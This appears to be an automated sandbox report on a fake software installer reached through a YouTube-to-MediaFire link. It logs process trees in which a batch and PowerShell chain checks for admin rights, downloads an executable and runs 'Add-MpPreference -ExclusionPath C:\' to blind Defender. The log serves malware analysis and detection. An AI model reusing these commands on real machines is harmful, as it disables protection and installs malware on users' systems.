PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 3668	5068	msedge.exe	86
PID 5068 wrote to memory of 3668	5068	msedge.exe	86
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87
PID 5068 wrote to memory of 1436	5068	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbHF2a3pZUHhoTEpWVFAtZUVmaTJveFJzU0FHd3xBQ3Jtc0trLUZLV0tNYi1Lei1ISXFFdDNFWVgxcVM3MFB3Mld2WHhmUWhNdzA0cWhub29ZejVHeFF1bkRWZm5PdDh1MUtVRkZWbVFPTG5WVHM5bElfTHRha1J0UFBfenc0SWNSWTBQdUsxYW9hYnZyUmJmWnAwVQ&q=https%3A%2F%2Fmediafire.com%2Ffolder%2Fzu705r17nu876%2F&v=5Bj9xjVBA24
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffd4a2946f8,0x7ffd4a294708,0x7ffd4a294718
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:3812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
  2⤵
  PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
  2⤵
  PID:1100
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6160 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6160 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:1400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6880 /prefetch:8
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
  2⤵
  PID:3980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:1
  2⤵
  PID:5676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
  2⤵
  PID:5216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:4700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1
  2⤵
  PID:5236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2260 /prefetch:8
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5092 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
  2⤵
  PID:3604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
  2⤵
  PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7524 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:5620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7400 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,12521726669014627591,17986279445311986507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4236

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4260

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x390 0x4ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5752

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5984

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:652

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Application_x32_x64\" -spe -an -ai#7zMap19218:100:7zEvent3346
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5768

C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.exe
"C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extract_and_run.bat
  2⤵
  PID:2036
- - C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe
    7za.exe e bin.zip -pYOUR_PASSWORD -oextracted_18513
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5164
- - C:\Windows\system32\timeout.exe
    timeout /t 2
    3⤵
    - Delays execution with timeout.exe
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "extracted_18513\sss.bat"
    3⤵
    PID:1244
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:3700
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:5576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extracted_18513\script.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3076
- - C:\Windows\system32\timeout.exe
    timeout /t 2
    3⤵
    - Delays execution with timeout.exe
    PID:2996

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4124

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:3312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:1160

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5708

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:6128

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:2132

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:4036

C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.exe
"C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\Setup.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extract_and_run.bat
  2⤵
  PID:3596
- - C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\7za.exe
    7za.exe e bin.zip -pYOUR_PASSWORD -oextracted_18718
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5332
- - C:\Windows\system32\timeout.exe
    timeout /t 2
    3⤵
    - Delays execution with timeout.exe
    PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "extracted_18718\sss.bat"
    3⤵
    PID:5860
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:5668
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\Downloads\Application_x32_x64\data-Setup\data\extracted_18718\script.ps1"
      4⤵
      Blocklisted process makes network request
